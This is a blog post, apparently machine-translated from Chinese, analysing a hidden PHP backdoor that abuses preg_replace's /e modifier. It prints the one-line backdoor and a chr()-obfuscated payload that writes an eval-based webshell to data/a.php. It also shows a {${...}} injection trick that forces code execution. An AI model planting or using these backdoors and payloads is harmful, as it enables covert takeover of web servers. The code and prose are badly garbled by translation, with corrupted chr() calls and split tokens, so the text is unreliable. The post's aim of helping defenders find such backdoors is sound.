Preg_replace: Hiding backdoors and future exploration

There are a lot of php backdoors, and there are too many steamed buns and games. But when I helped my friends Check the server, I found such malicious code.

This is the case. None of the tools used by a friend's website to search for backdoors found a php Trojan. I can't find it all the time. The trick is very advanced.

After the backdoors are used up, the backdoors are always deleted, but the backdoors can be continued every time. This is really a pain point.

Later, I found a trace of clues in the log. Through my analysis, I found that an IP address is always very strange to POST data to a file. Then

After the time, the IP address accesses an inexplicable file. The name is obviously not a normal system file, but a PHP backdoor. But the backdoor will soon be used.

Deleted.

Haha, I am very careful when I encounter a problem.

Then, through analysis, we found that the code of the file accessed by Xiao Hei was:

The Code is as follows:	Copy code
@ Preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied ");

If you see this code, there is no problem, but it is the malicious code and backdoor hidden by Xiao Hei. Hiding, basically any

None of the scanning and killing software can be found.

Preg_replace function prototype:

Mixed preg_replace (mixed pattern, mixed replacement, mixed subject [, int limit])

Note:

The/e modifier enables preg_replace () to treat the replacement parameter as PHP code (after appropriate reverse references are replaced ). Tip: make sure that

Replacement constitutes a valid PHP code string. Otherwise, PHP will report a syntax parsing error in the row containing preg_replace ().

Error.

The above code is POST to accept data to test, it is more troublesome, If you replace it with GET to obtain data...

Example:

The Code is as follows:	Copy code
Echo preg_replace ("/test/e", $ _ GET ["h"], "jutst test ");

If we submit? H = phpinfo (), phpinfo () will be executed (with the/e modifier, preg_replace will treat the replacement parameter as PHP

Code execution ).

If we want to POST, what will happen if we test and submit the following code?

The Code is as follows:

Copy code

? H = eval (chr (1, 102 ). chr (1, 112 ). chr (1, 117 ). chr (1, 116 ). chr (1, 115 ). chr (40 ). chr (1, 102 ). chr (1, 111 ). chr (1, 112 ). chr (1, 101 ). chr (110 ). chr (40 ). chr (39 ). chr (1, 100 ). chr (97 ). chr (1, 116 ). chr (97 ). chr (47 ). chr (97 ). chr (46 ). chr (1, 112 ). chr (1, 104 ). chr (112 ). chr (39 ). chr (44 ). chr (39 ). chr (1, 119 ). chr (39 ). chr (41 ). chr (44 ). chr (39 ). chr (60 ). chr (63 ). chr (1, 112 ). chr (104 ). chr (1, 112 ). chr (32 ). chr (1, 101 ). chr (1, 118 ). chr (97 ). chr (1, 108 ). chr (40 ). chr (36 ). chr (95 ). chr (80 ). chr (79 ). chr (83 ). chr (84 ). chr (91 ). chr (99 ). chr (1, 109 ). chr (1, 100 ). chr (93 ). chr (41 ). chr (63 ). chr (62 ). chr (39 ). chr (41 ). chr (59 ))

The plaintext corresponding to the ciphertext is:

The Code is as follows:	Copy code
Fputs (fopen (data/a. php, w ),);

The execution result is to generate a trojan file a. php In the/data/directory.

This is horrible ....

Another difficult example:

 

View code printing?

The Code is as follows:	Copy code
<? Function test ($ str) { } Echo preg_replace ("/s * [php] (. + ?) [/Php] s */ies ", 'test (" 1 ") ', $ _ GET [" h "]); ?>

Submit? H = [php] phpinfo () [/php]. Will phpinfo () be executed?

Certainly not. After regular expression matching, the replacement parameter is changed to 'test ("phpinfo") '. In this case, phpinfo is only treated as a string parameter.

Number.

Is there a way to execute it?

Of course. In this case, if we submit? H = [php] {$ {phpinfo ()} [/php], phpinfo () will be executed. Why?

In php, if a double quotation mark contains a variable, the php interpreter replaces it with the result after the variable is interpreted. Variables in single quotation marks are not processed.

Note: Functions in double quotation marks are not executed and replaced.

Here we need to construct a special variable through {$ {}, 'test ("{$ {phpinfo ()}}")', to make the function executed

($ {Phpinfo ()} will be interpreted and executed ).

You can perform the following tests first:

Echo "{$ {phpinfo ()}"; phpinfo will be successfully executed.

Therefore, when searching for backdoors, you must find them.

OK. I have learned so much about the above Code:

The Code is as follows:	Copy code
1 @ preg_replace ("// e", $ _ POST ['in _ COMSENZ '], "Access Denied ");

The seemingly normal code is actually an extremely dangerous code, which is quite hidden.